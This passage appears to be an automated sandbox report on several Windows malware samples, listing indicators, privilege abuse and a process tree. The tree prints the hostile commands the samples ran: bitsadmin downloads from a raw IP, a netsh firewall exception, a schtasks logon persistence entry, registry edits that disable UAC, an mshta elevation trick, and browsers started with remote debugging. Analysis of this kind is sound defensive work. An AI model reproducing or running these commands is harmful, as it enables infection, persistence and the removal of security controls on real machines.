1004	TPB-1.exe
1004	TPB-1.exe
1004	TPB-1.exe
1004	TPB-1.exe
932	chrome.exe
932	chrome.exe
1076	nbea1t8.exe
1076	nbea1t8.exe
5492	powershell.exe
5492	powershell.exe
5492	powershell.exe
5552	msedge.exe
5552	msedge.exe
1004	TPB-1.exe
1004	TPB-1.exe
5228	msedge.exe
5228	msedge.exe
1004	TPB-1.exe
1004	TPB-1.exe
5416	powershell.exe
5416	powershell.exe
4852	msedge.exe
4852	msedge.exe
5240	msedge.exe
5240	msedge.exe
5416	powershell.exe
5416	powershell.exe
1004	TPB-1.exe
1004	TPB-1.exe
4224	identity_helper.exe
4224	identity_helper.exe
6920	GoogleUpdate.exe
6920	GoogleUpdate.exe
6920	GoogleUpdate.exe
6920	GoogleUpdate.exe
6920	GoogleUpdate.exe
6920	GoogleUpdate.exe
6904	random.exe
6904	random.exe
6904	random.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

take3.exe

pid	Process
3604	take3.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

Processes:

chrome.exemsedge.exemsedge.exe

pid	Process
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

langla.exechrome.exesvchost.exehttp.exeSGVP%20Client%20Users.exepowershell.exepowershell.exeRegistry.exeRuntime Broker.exeGoogleUpdate.exewwbizsrvs.exe

description	pid	Process
Token: SeDebugPrivilege	2120	langla.exe
Token: SeShutdownPrivilege	932	chrome.exe
Token: SeCreatePagefilePrivilege	932	chrome.exe
Token: SeShutdownPrivilege	932	chrome.exe
Token: SeCreatePagefilePrivilege	932	chrome.exe
Token: SeDebugPrivilege	2368	svchost.exe
Token: 33	2368	svchost.exe
Token: SeIncBasePriorityPrivilege	2368	svchost.exe
Token: SeDebugPrivilege	2976	http.exe
Token: SeDebugPrivilege	2976	http.exe
Token: SeShutdownPrivilege	932	chrome.exe
Token: SeCreatePagefilePrivilege	932	chrome.exe
Token: SeShutdownPrivilege	932	chrome.exe
Token: SeCreatePagefilePrivilege	932	chrome.exe
Token: SeDebugPrivilege	392	SGVP%20Client%20Users.exe
Token: SeShutdownPrivilege	932	chrome.exe
Token: SeCreatePagefilePrivilege	932	chrome.exe
Token: SeShutdownPrivilege	932	chrome.exe
Token: SeCreatePagefilePrivilege	932	chrome.exe
Token: SeShutdownPrivilege	932	chrome.exe
Token: SeCreatePagefilePrivilege	932	chrome.exe
Token: SeDebugPrivilege	5492	powershell.exe
Token: 33	2368	svchost.exe
Token: SeIncBasePriorityPrivilege	2368	svchost.exe
Token: 33	2368	svchost.exe
Token: SeIncBasePriorityPrivilege	2368	svchost.exe
Token: SeDebugPrivilege	5416	powershell.exe
Token: SeDebugPrivilege	6324	Registry.exe
Token: 33	2368	svchost.exe
Token: SeIncBasePriorityPrivilege	2368	svchost.exe
Token: SeDebugPrivilege	6544	Runtime Broker.exe
Token: SeDebugPrivilege	6920	GoogleUpdate.exe
Token: SeDebugPrivilege	6920	GoogleUpdate.exe
Token: SeDebugPrivilege	6920	GoogleUpdate.exe
Token: 33	2368	svchost.exe
Token: SeIncBasePriorityPrivilege	2368	svchost.exe
Token: 33	2368	svchost.exe
Token: SeIncBasePriorityPrivilege	2368	svchost.exe
Token: 33	2368	svchost.exe
Token: SeIncBasePriorityPrivilege	2368	svchost.exe
Token: SeBackupPrivilege	6588	wwbizsrvs.exe
Token: SeRestorePrivilege	6588	wwbizsrvs.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exemsedge.exet6kzDd6.exemsedge.exe

pid	Process
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
932	chrome.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5740	t6kzDd6.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe

Suspicious use of SendNotifyMessage 53 IoCs

Processes:

msedge.exemsedge.exeRuntime Broker.exeFACTURA09876567000.battranslucently.exe

pid	Process
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5228	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
5240	msedge.exe
6544	Runtime Broker.exe
5968	FACTURA09876567000.bat
5968	FACTURA09876567000.bat
5716	translucently.exe
5716	translucently.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

take3.exetake3.exetvtC9D3.exedsd.exeuxN4wDZ.exelangla.execmd.execmd.exesvchost.exeTPB-1.exechrome.exe

description	pid	Process	procid_target
PID 2468 wrote to memory of 3604	2468	take3.exe	85
PID 2468 wrote to memory of 3604	2468	take3.exe	85
PID 3604 wrote to memory of 232	3604	take3.exe	97
PID 3604 wrote to memory of 232	3604	take3.exe	97
PID 3604 wrote to memory of 232	3604	take3.exe	97
PID 3604 wrote to memory of 5012	3604	take3.exe	98
PID 3604 wrote to memory of 5012	3604	take3.exe	98
PID 3604 wrote to memory of 5012	3604	take3.exe	98
PID 5012 wrote to memory of 524	5012	tvtC9D3.exe	99
PID 5012 wrote to memory of 524	5012	tvtC9D3.exe	99
PID 5012 wrote to memory of 524	5012	tvtC9D3.exe	99
PID 5012 wrote to memory of 4580	5012	tvtC9D3.exe	101
PID 5012 wrote to memory of 4580	5012	tvtC9D3.exe	101
PID 5012 wrote to memory of 4580	5012	tvtC9D3.exe	101
PID 3604 wrote to memory of 1564	3604	take3.exe	105
PID 3604 wrote to memory of 1564	3604	take3.exe	105
PID 3604 wrote to memory of 1564	3604	take3.exe	105
PID 232 wrote to memory of 2368	232	dsd.exe	107
PID 232 wrote to memory of 2368	232	dsd.exe	107
PID 232 wrote to memory of 2368	232	dsd.exe	107
PID 3604 wrote to memory of 2120	3604	take3.exe	108
PID 3604 wrote to memory of 2120	3604	take3.exe	108
PID 3604 wrote to memory of 2120	3604	take3.exe	108
PID 3604 wrote to memory of 1004	3604	take3.exe	109
PID 3604 wrote to memory of 1004	3604	take3.exe	109
PID 3604 wrote to memory of 1004	3604	take3.exe	109
PID 3604 wrote to memory of 2916	3604	take3.exe	111
PID 3604 wrote to memory of 2916	3604	take3.exe	111
PID 3604 wrote to memory of 2916	3604	take3.exe	111
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 2916 wrote to memory of 4928	2916	uxN4wDZ.exe	113
PID 3604 wrote to memory of 5112	3604	take3.exe	115
PID 3604 wrote to memory of 5112	3604	take3.exe	115
PID 2120 wrote to memory of 5056	2120	langla.exe	117
PID 2120 wrote to memory of 5056	2120	langla.exe	117
PID 2120 wrote to memory of 5056	2120	langla.exe	117
PID 2120 wrote to memory of 916	2120	langla.exe	119
PID 2120 wrote to memory of 916	2120	langla.exe	119
PID 2120 wrote to memory of 916	2120	langla.exe	119
PID 5056 wrote to memory of 1912	5056	cmd.exe	121
PID 5056 wrote to memory of 1912	5056	cmd.exe	121
PID 5056 wrote to memory of 1912	5056	cmd.exe	121
PID 916 wrote to memory of 2472	916	cmd.exe	122
PID 916 wrote to memory of 2472	916	cmd.exe	122
PID 916 wrote to memory of 2472	916	cmd.exe	122
PID 2368 wrote to memory of 4456	2368	svchost.exe	124
PID 2368 wrote to memory of 4456	2368	svchost.exe	124
PID 2368 wrote to memory of 4456	2368	svchost.exe	124
PID 3604 wrote to memory of 3612	3604	take3.exe	126
PID 3604 wrote to memory of 3612	3604	take3.exe	126
PID 916 wrote to memory of 2976	916	cmd.exe	127
PID 916 wrote to memory of 2976	916	cmd.exe	127
PID 916 wrote to memory of 2976	916	cmd.exe	127
PID 1004 wrote to memory of 932	1004	TPB-1.exe	129
PID 1004 wrote to memory of 932	1004	TPB-1.exe	129
PID 932 wrote to memory of 3008	932	chrome.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
4760	attrib.exe
5236	attrib.exe
5312	attrib.exe
8844	attrib.exe

C:\Users\Admin\AppData\Local\Temp\take3.exe
"C:\Users\Admin\AppData\Local\Temp\take3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2468
- C:\Users\Admin\AppData\Local\Temp\take3.exe
  "C:\Users\Admin\AppData\Local\Temp\take3.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:232
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2368
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4456
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 996
        5⤵
        
        PID:8056
- - C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5012
  - - C:\Windows\SysWOW64\ping.exe
      ping -n 1 8.8.8.8
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:524
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:4580
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:4576
- - C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1564
- - C:\Users\Admin\Downloads\UrlHausFiles\langla.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\langla.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2120
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5056
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1912
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE81E.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2472
    - - C:\Users\Admin\AppData\Roaming\http.exe
        
        "C:\Users\Admin\AppData\Roaming\http.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
- - C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1004
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:932
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffeaf67cc40,0x7ffeaf67cc4c,0x7ffeaf67cc58
        5⤵
        
        PID:3008
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:2
        5⤵
        
        PID:2864
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1864,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:3
        5⤵
        
        PID:3944
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2456 /prefetch:8
        5⤵
        
        PID:2936
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3760
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3220 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:976
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4596 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2680
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
        5⤵
        
        PID:1892
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4664 /prefetch:8
        5⤵
        
        PID:4980
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4656,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8
        5⤵
        
        PID:3888
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5112,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:8
        5⤵
        
        PID:2772
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5344 /prefetch:8
        5⤵
        
        PID:2188
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4896,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5336 /prefetch:8
        5⤵
        
        PID:5488
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5520,i,9521404279577563719,9802053843117621187,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5484 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:5264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:4256
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
        5⤵
        
        PID:888
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4349545209397118218,18204725807592143253,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
        5⤵
        
        PID:4964
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAFIEGIECGCB" & exit
      4⤵
      PID:7976
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:8184
- - C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2916
  - - C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4928
- - C:\Users\Admin\Downloads\UrlHausFiles\22.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\22.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:5112
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\paste.ps1"
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:3612
- - C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1076
- - C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:392
- - C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5680
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D69.tmp\D6A.tmp\D6B.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"
      4⤵
      PID:732
    - - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
        5⤵
        Checks computer location settings
        Access Token Manipulation: Create Process with Token
        
        PID:5972
      - C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE
        
        "C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5916
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10C4.tmp\10C5.tmp\10C6.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"
        7⤵
        
        PID:6068
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:6120
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:6132
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:4872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        8⤵
        
        PID:5148
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        9⤵
        
        PID:5196
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        8⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5228
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
        9⤵
        
        PID:5504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
